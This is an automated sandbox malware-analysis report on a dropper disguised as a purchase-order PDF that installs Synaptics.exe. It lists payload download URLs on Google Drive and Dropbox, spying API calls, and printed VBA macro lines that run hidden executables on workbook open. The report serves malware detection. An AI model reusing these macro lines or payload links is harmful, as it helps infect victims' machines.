                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwx5
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwzY
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxg6Xg_
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyn%
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzV
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzsN
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzzl
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~=
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~A
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userc
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/-
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWyr7
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWyr77E
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2678740944.000000000EDE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc&HR
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclick-c
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn-
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuM
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadicy
                              Source: Synaptics.exe, 00000003.00000002.2688843389.000000000EFAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00EA7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00EA7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E94342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00EBF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                              System Summary

                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NEnoihuS.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NEBFQQYWPS.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: NEnoihuS.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: NEBFQQYWPS.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: NEnoihuS.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: NEBFQQYWPS.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: NEnoihuS.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: NEBFQQYWPS.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E970AE: CreateFileW,DeviceIoControl,CloseHandle
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E8B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E982D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX6FCE.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: String function: 00E77750 appears 42 times
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: String function: 00E6F885 appears 68 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 8704
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX6FCE.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2139101361.0000000000616000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 16-12-2024-Pdf.exe
